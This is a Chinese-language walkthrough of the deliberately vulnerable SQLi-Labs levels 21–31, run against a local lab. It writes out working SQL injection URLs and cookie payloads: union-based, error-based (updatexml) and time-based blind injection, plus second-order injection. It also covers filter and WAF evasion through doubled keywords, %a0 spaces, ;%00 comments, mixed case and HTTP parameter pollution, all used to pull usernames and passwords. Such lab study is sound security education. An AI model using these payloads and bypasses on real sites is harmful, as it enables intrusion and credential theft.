Sqli Labs Less-21-31

Less-21：

　　使用正确的用户名和密码登录以后，用Burp Suite进行代理，cookie如下图所示：

 　　我们发现现在cookie处于乱码状态，在百度搜索Base64就可以解决，推荐网址https://base64.us/解码后就是admin：

 　　接下来要做的事，就是把相uname后面的语句通过这样的方式编码，写到cookie中，语句为：

　　uname=')union select 1,2,database()#

　　编码后为：

　　Jyl1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj

 其他的代码都与Less-20相同，无论使用哪种注入方式，把命令编码即可。

Less-22：“（双引号）包裹

　　这一关用”（双引号）进行包裹，没有其他的改动，与Less-21操作方式相同，不再赘述。

Less-23：

　　我们进入Less-21，在index中添加显示sql语句的代码后，我们敲进?id=1：

 　　而在键入?id=1'后发现报错，说明存在注入漏洞，我们加入--+注释符，发现并不能闭合，还是报错：

法一：联合查询

 　　我们这个时候需要打开index查看源码，看看到底是为什么，发现在其中把注释符全部都替换成了空格符，注释符都被无效了：

 　　我们在这里只能使用另外一种特殊的注释符：;%00（英文的分号，百分号，00），我们发现此时回显正确了：

 　　接下来的操作就是联合查询的过程，代码如下，不再赘述：

 查多少列

　　/?id=1‘  order by 3  ;%00

 查找回显位置

　　/?id=-1’  union select 1,2,3    ;%00  

查库：　　

　　/?id=-1‘  union select 1,2, group_concat(schema_name) from    information_schema.schemata    ;%00 

查表：

　　/?id=-1‘  union select 1,2, group_concat(table_name) from  information_schema.tables where table_schema = 0x7365637572697479    ;%00

查字段：  

　　/?id=-1‘  union select 1,2, group_concat(column_name) from information_schema.columns where table_name = 0x7573657273   ;%00 

查username与password：

　　/?id=-1‘  union select 1,2, group_concat(concat_ws(0x7e,username,password)) from security.users   ;%00 

　　

　　查询完成以后，貌似并没有问题，但是事实上有一个很大的问题。我们输入下列语句，竟然发现回显正确，把其中的and换为or也是一样正确：

　　http://192.168.1.1/sqli-labs-master/Less-23/?id=1'order by 10 and '1'='1

 

 　　这里牵扯到sql语句的解析顺序，导致order by被忽略了，所以执行正确。

 　　所以我们应当采取别的方式来检测表中的列数，不能使用order by语句，我们这里不使用特殊符号了，使用and '1'='1，来进行闭合，使用or也可以，或者直接在末尾用‘（单引号）闭合，在其中使用union select语句来检测列数：

　　 http://192.168.1.1/sqli-labs-master/Less-23/?id=1'and '1'='1

 

 　　http://192.168.1.1/sqli-labs-master/Less-23/?id=1'union select 1,2,3,'

 　　而在后面的1，2，3后继续增加数字，发现报错：

 　　通过这个语句我们可以检测出来列数是3。

 　　把id=的值改为表中id没有的值，这里我改为-1，发现回显可以选择数据的位置：

 　　接下来选择2，3位置继续注入，下面就是联合查询的语句操作了

 查询当前的数据库：

　　http://192.168.1.1/sqli-labs-master/Less-23/?id=-1' union select 1,2,database()' 

查库：

　　http://192.168.1.1/sqli-labs-master/Less-23/?id=-1'union select 1,2,(select group_concat(schema_name) from information_schema.schemata) ' 

查表：

　　http://192.168.1.1/sqli-labs-master/Less-23/?id=-1'union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)'

查列：

　　http://192.168.1.1/sqli-labs-master/Less-23/?id=-1'union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)'

查字段：　

　　http://192.168.1.1/sqli-labs-master/Less-23/?id=-1' union select 1,2,(select  group_concat(concat_ws(0x7e,username,password)) from security.users)'

　　不再赘述，下面是最终的查询结果：

 法二：报错注入

 　　我们还可以借用updatexml()函数的格式报错来进行报错注入，爆出数据：

查当前的数据库：

　　http://192.168.1.1/sqli-labs-master/Less-23/?id=1'and updatexml(1,concat(0x7e,(database())),1) or '1'='1

查库：

　　http://192.168.1.1/sqli-labs-master/Less-23/?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),1) or '1'='1

　　下面就按照这种方式来更换select语句，一步步爆破出所有数据，不再赘述。

Less-24：

　　Less-24需要使用二次注入，我们先学习二次注入：

　　简单的说，二次注入是指已存储（数据库、文件）的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。
　　网站对我们输入的一些重要的关键字进行了转义，但是这些我们构造的语句已经写进了数据库，可以在没有被转义的地方使用
　　可能每一次注入都不构成漏洞，但是如果一起用就可能造成注入。

　　简单来说，我们把一个伪装后的间谍打入了敌人内部，敌人只在招人时查身份信息，而在成功打入敌人内部后，再用人的时候是不会再查信息的，默认都是安全的，而他在调用间谍做任务的时候，我们就能够实现窃取他们的情报，即进行sql注入爆破信息。这就对我们的注入方式提出了要求，不能使用普通注入，需要使用二次注入：

普通注入  （1）在http后面构造语句，是立即直接生效的

          （2）一次注入很容易被扫描工具扫描到

二次注入  （1）先构造语句（有被转义字符的语句）

          （2）我们构造的恶意语句存入数据库

          （3）第二次构造语句（结合前面已经存入数据库的语句，成功。因为系统没有对已经存入数据库的数据做检查）

          （4）二次注入更加难以被发现

　　（以上内容摘自https://www.jianshu.com/p/746164a91422）

二次注入，可以概括为以下两步:

第一步：插入恶意数据
　　进行数据库插入数据时，对其中的特殊字符进行了转义处理，在写入数据库的时候又保留了原来的数据。

第二步：引用恶意数据
　　开发者默认存入数据库的数据都是安全的，在进行查询时，直接从数据库中取出恶意数据，没有进行进一步的检验的处理。

　　接下来我们就可以利用二次注入的知识来解Less-24.

　　我们先创建一个相似的账号，用户名admin‘#，密码123：

　　我们进入mysql，键入命令select # from users，发现创建成功：

 

 　　然后登录新的账号：

 　　然后修改密码为123456，修改之后重新登录admin‘#，发现登录不上，原因是，在创建admin‘#之后，这个账号再次检索的时候根本不用进行转义检测，所以事实上搜索到的数据库名时admin，并不是admin’#，所以修改的密码也是admin的密码，所以登录的时候，username应该是admin，而不是admin‘#：

　　同时打开mysql输入命令，我们看到变化的密码其实是admin的，已经变成123456，admin’#的密码还是初始设置的123：

WAF绕过

　　在前面的内容我们已经发现，对字符进行转义的时候我们被迫必须进行绕过，前面我们碰到了注释符被转义的情况，我们采用了新的特殊注释符;%00进行注释，或者用or，and语句进行闭合。

　　我们这里的WAF绕过主要有三种方式：白盒绕过、黑盒绕过、fuzz测试。

1.白盒绕过：

　　这种方法需要分析源代码，我们通过分析，可以得知源代码中的转义规则，从而绕过。

2.黑盒绕过：

　　<1>.架构层面WAF

　　　　(1）寻找源网站绕过WAF检测

　　　　　　针对的是云WAF，找到源网站的真实地址进行绕过。

　　　　(2)同网段绕过WAF

　　　　　　一个网段中的数据可能不会经过WAF，实现绕过。

　　<2>.资源限制角度WAF

　　　　　考虑了业务优先，所以构造较大的超大数据包可能不会进行检测，实现绕过。（例如Post语句）

　　<3>.协议层面绕过WAF

　　　　（1）协议未覆盖绕过WAF

　　　　　　　　由于业务需要只对某种类型的数据进行检测，例如只检测get型，那么Post就可以绕过了。

　　　　（2）参数污染

　　　　　　　　可能只对某一个参数进行检测，其他参数没有覆盖，例如?id=1 and id=2，WAF可能只检                         测id=1，忽略id=2,我们这时可以在id=2处进行注入。

　　<4>.规则层面绕过WAF

 　　　　情况较多，包括sql注释符，空白符，函数分隔符号，浮点数词法解释，报错注入，特殊语法等等            有一些我们前面都使用过。

3.fuzz测试

　　可以使用Burp Suite与手工配合进行测试，测试成功后用脚本进行处理，

　　以注释符为例子不断fuzz
　　（1）先测试最基本的语句
　　union/**/select
　　（2）再测试中间引入特殊字符
　　union/aaaa%01bbs/select
　　（3）最后测试注释长度
　　union/aaaaaaaaaaaaaaaaaaaaaa/select
　　最基本的模式
　　union/anything/select

（以上资料可以参考：　https://blog.csdn.net/qq_33441500/article/details/102567950）

Less-25：使用””进行包裹，or and 被过滤

　　输入语句，发现回显正常，下面还有一行Hiti提示，是关于返回值的提示：

　　http://192.168.1.1/sqli-labs-master/Less-25/?id=1

　　测试发现报错，在使用--+注释符回显正常;

　　http://192.168.1.1/sqli-labs-master/Less-25/?id=1'

　　http://192.168.1.1/sqli-labs-master/Less-25/?id=1'--+

　　但是在使用order by语句的时候，发现回显不正常，下面提示我们语句中的or两个字母没有了：

　　http://192.168.1.1/sqli-labs-master/Less-25/?id=1'order by 3--+

 

 　　此时我们看源码，发现or和and都被替换为空，且不区分大小写：

 

法一：双写的联合查询

　　我们这里使用双写的方法，把or和and的每一个字母之间，使用or或and分隔开，发现返回成功：

　　http://192.168.1.1/sqli-labs-master/Less-25/?id=1'OorRder by 3--+

 

 　　接下来就是联合查询语句的输入了，这里唯一变化的地方，就是所有出现or和and的地方全都采用双写，其他的命令没有改动，语句如下，不再赘述。

获得回显位置：

　　http://192.168.27.156/sqli-labs-master/sqli-labs-master/Less-25/?id =-1‘  union select 1,2,3--+

查库：

　　http://192.168.27.156/sqli-labs-master/sqli-labs-master/Less-25/?id =-1‘  union select 1,2,schema_name from infoorrmation_schema.schemata --+

　　http://192.168.27.156/sqli-labs-master/sqli-labs-master/Less-25/?id =-1‘  union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata --+

查表：

　　http://192.168.27.156/sqli-labs-master/sqli-labs-master/Less-25/?id =-1‘  union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7365637572697479 --+

查字段：

　　 http://192.168.27.156/sqli-labs-master/sqli-labs-master/Less-25/?id =-1‘  union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=0x7573657273--+

爆破username和password：

　　http://192.168.27.156/sqli-labs-master/sqli-labs-master/Less-25/?id =-1‘  union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+

法二：替换or的报错注入

 　　除了字母，可以用符号表示含义，or可以替换为||，我们发现返回正常：

　　http://192.168.1.1/sqli-labs-master/Less-25/?id=1'||'1'='1

　　http://192.168.1.1/sqli-labs-master/Less-25/?id=1'||1=1--+

 　　那么我们可以用or的语句来闭合，也可以使用注释符，从而使用updatexml（）函数的报错来爆破

　　 http://192.168.27.156/sqli-labs-master/sqli-labs-master/Less-25/?id=-1‘  || updatexml(1,concat(0x7e,(database()),0x7e),1)--+

爆出当前数据库：

　　 http://192.168.27.156/sqli-labs-master/sqli-labs-master/Less-25/?id=-1‘  || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+

　　这里不要使用group_concat()，因为数据显示不完整，使用limit一个个遍历即可。

Less-25a：无包裹双写

　　键入语句页面显示正常：

　　http://192.168.1.1/sqli-labs-master/Less-25a/?id=1

 　　尝试单引号，看看有没有注入漏洞，此时页面发生显著变化，数据消失，说明存在注入，但是通过$sql语句得知，此处并没有将id值进行包裹：

　　http://192.168.1.1/sqli-labs-master/Less-25a/?id=1'

 　　尝试order by语句，发现也是双写，所以我们可以参考Less-25，除了没有包裹，其他语句相同，不再赘述。

Less-26

　　输入语句正常回显：

　　http://192.168.1.1/sqli-labs-master/Less-26/?id=1

　　加单引号报错，说明存在注入：

　　http://192.168.1.1/sqli-labs-master/Less-26/?id=1’

　　--+注释符没有输出出来，所以可能是被转义了：

　　http://192.168.1.1/sqli-labs-master/Less-26/?id=1--+

　　使用特殊注释符，回显正常：

　　http://192.168.1.1/sqli-labs-master/Less-26/?id=1;%00

 　　看index中的源码，发现所有的or and 注释符 空格 都被替换了：

　　所以显而易见我们要像给or找个替代符号一样，给其他的被转义的符号找个替代，当然可以采用双写的方法，但是太过繁琐：

　　　　or可以用||替换

　　　　and可以用&&

　　　　注释符用;%00替代

　　　　空格用%a0替代

　　采用报错注入，我们可以爆破出所有的信息，当然该双写的地方还是要双写：

查看当前数据库：

　　http://192.168.1.1/sqli-labs-master/Less-26/?id=1111' || updatexml(1, concat(0x7e, database())  ,1)  || '1'='1

查表：

　　http://192.168.1.1/sqli-labs-master/Less-26/?id=1' || updatexml(1, concat(0x7e, (select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema=0x7365637572697479))) ,1)  || '1'='1

查字段：

　　http://192.168.1.1/sqli-labs-master/Less-26/?id=1' || updatexml(1, concat(0x7e, (select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name='users'))) ,1)  || '1'='1

查值：

　　http://192.168.1.1/sqli-labs-master/Less-26/?id=1' || updatexml(1, concat(0x7e, (select (group_concat(  concat_ws(0x7e,username,passwoorrd)  )) from (security.users))) ,1)  || '1'='1

　　上面都省略示意图，最终结果为：

 　　我们发现取出的结果少，而且不完整，所以可以使用：

　　http://192.168.1.1/sqli-labs-master/Less-26//?id=1‘ || updatexml(1, concat(0x7e, ( select (group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users)  where (id=2) ) )   ,1) || ’1‘=‘1 

　　通过改变id的值可以遍历所有的数据：

 　　当然也可以使用联合查询，但是注意把空格用%a0代替，;%00作为注释符，

　　http://192.168.1.1/sqli-labs-master/Less-26//?id=1111' %a0 union%a0 select%a0 1,2,(select%a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00

Less-26结束。

Less-26a：用?id=1')包裹

 　　我们一样查看源码，发现与Less-26一样对很多符号进行了转义，所以还是使用跟Less-26一样的方法，然而使用报错注入时出现了问题：

　　http://192.168.1.1/sqli-labs-master/Less-26a/?id=1111'） || updatexml(1, concat(0x7e, database())  ,1)  || '1'='1

　　查看index中的源码，发现了问题，它屏蔽了错误信息，不会打印出来：

 　　所以我们这里只能使用联合查询，联合查询参考前面，不再赘述。

Less-27

　　我们输入正常的语句，发现和上面相同，?id=1正常，?id=1'回显错误，?id=1' ;%00回显正常。打开index源码，发现它相比上面的关卡，增加了union和select的转义，而且区分大小写：

法一：联合查询

 　　既然区分大小写，在键入union和select的时候，我们就采用大小写混合的方法：

　　http://192.168.1.1/sqli-labs-master/Less-27/?id=1111' %a0 uNion %a0sElect%a0 1,2,3;%00

 　　接下来的步骤就是联合查询，不再赘述。

法二：报错注入

　　既然对union和select做出了限制，那我们干脆就使用updatexml函数的报错来进行注入：

　　http://192.168.1.1/sqli-labs-master/Less-27/?id=1'%a0|| %a0 updatexml(1,concat(0x7e,(database())),1) %a0 || '1'='1

 　　具体过程和语句参考Less-26.

法三：布尔盲注

　　使用基于时间的盲注，用%26%26替代&&，意为and，因为and饿时被转义的字符：

　　http://192.168.1.1/sqli-labs-master/Less-27/?id=1' %26%26 if( length(database())>1, 1, sleep(5)) %26%26 %0a '1'='1

 　　具体过程及语句不再赘述。

Less-27a：用?id=1"包裹

　　这一关与Less-27除了包裹上的不同，别无二致，不再赘述。

Less-28

　　照旧测试出注入点为'）（单引号加括号）：

　　http://192.168.1.1/sqli-labs-master/Less-28/?id=1');%00

 　　查看index源码，发现无法使用union select联合查询，空格，注释符也都被过滤：

　　所以我们这里采用%a0代替空格的方式进行查询，这样就可以使用了，此处不再赘述：

　　http://192.168.1.1/sqli-labs-master/Less-28/?id=123456') %a0 union %a0 select %a0 1,2,3 ;%00

 

Less-28a

　　没有过滤注释符之类的符号，只过滤了union select语句：

 　　其他的语句跟第28关一样。

 Less-29

Jsp Study环境的配置：

　　我们这里还是进行尝试，结果发现这一关与Less-1相同，显而是有问题的，可以从介绍上看出，第29关被称为世界上最好的WAF。真正的Less-29在其他地方，在65关的文件夹下我们下拉到最底部，发现有个名叫tomcat的压缩包，点开发现里面有真正的Less-29到Less-32，我们这里需要使用新的武器了。

 　　这里我们需要进行Jsp Study环境的配置，我们可以在以下网址下载，选择最右边的下载即可：

　　https://www.xp.cn/download.html

 　　解压安装的地方因人而异，在与Php Study同一个目录下新建一个文件夹，然后在这个文件夹里解压，这里我把它命名为JSPStudy：

　　把我们上面说的tomcat压缩包解压到新建的文件夹 JSPStudy的www文件夹中，解压出来是sqli-labs文件夹;

 　　打开其中的Less-29，右击用Notepad打开index.jsp，我们看到选中的地方，括号里的网址所指向的目录，这是将要打开的原来65关Less-29的index.php所在的位置，根据自己的情况来修改，我这里的地址如图所示：

 　　我们接下来需要修改Jsp Study的端口号，因为php Study默认端口为80，不修改可能会因为端口占用而无法启动，按照下图操作即可：

 

 　　最终我们通过火狐登录的时候，输入网址跳转的地方是sqli-labs的65关：

 　　而加上8080端口的时候才能跳转到Jsp，这时跳转到的页面还有点异常：

 　　我们这个时候在后面加上index.jsp?id=1的时候，返回正常了：

 　　而在用“（单引号）包裹的时候，在后面加注释符--+，此时回显错误，没有出现最开始那种跟Less-1一样的情况，说明我们此时配置成功了：

 接下来我们可以正式准备解决这一关的问题了，这一关我们使用的方法是参数污染：

　　参数污染：jsp/tomcat使用getgetParameter("id")获取到的是第一个值，php/apache使用$_GET["id"]获取的是第二个值，那么第一个id纯数字，第二个id的值，也就是，需要注入两个参数，第二个参数才是可以实现sql注入的

　　使用两个id的命令：index.jsp?id=1&id=2请求,服务器配置情况，客户端请求首先过tomcat，tomcat解析第一个参数，接下来tomcat去请求apache（php）服务器，apache解析最后一个参数。那最终返回客户端的应该是id=2的参数。

　　即jsp/tomcat使用getParameter("id")获取到的是第一个值，php/apache使用$_GET["id"]获取的是第二个值，那么第一个id纯数字，第二个id的值我们往往在tomcat服务器处做数据过滤和处理，功能类似为一个WAF。而正因为解析参数的不同，我们此处可以利用该原理绕过WAF的检测。该用法就是HPP（HTTP Parameter Pollution），http参数污染攻击的一个应用。HPP可对服务器和客户端都能够造成一定的威胁。

　　这里我们让apache解析后面的参数：

 　　我们接下来就可以在后面参数的部分进行注入了，语句都是联合查询的语句，此处只放出最后的语句，不再赘述：

　　http://192.168.1.1:8080/sqli-labs/Less-29/index.jsp?id=1&&id=0' union select 1,2,(concat_ws(0x7e,username,password)) from security.users limit 3,1  --+

Less-30：用?id=1&id=1"包裹　　

　　30关与29关基本一样，就是sql闭合变成了双引号，我们以测试列数的语句为例：

　　http://192.168.1.1:8080/sqli-labs/Less-30/index.jsp?id=1&id=1" order by 3--+

 　　其他的语句都是联合查询的相关语句，不再赘述。

　　我们发现在回显异常的时候，没有报错出现，这就导致我们不能使用报错注入了。

　　Less-30完成。

Less-31：用?id=1&id=1")包裹

　　与Less-29相似，除了这里的包裹方式修改为“）（双引号加括号），其他的内容并没有改变，一样使用联合查询注入，这里只把最后的语句放出来，不再赘述：

　　http://192.168.1.1:8080/sqli-labs/Less-31/index.jsp?id=1&id=1")union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+

　　Less-31完成。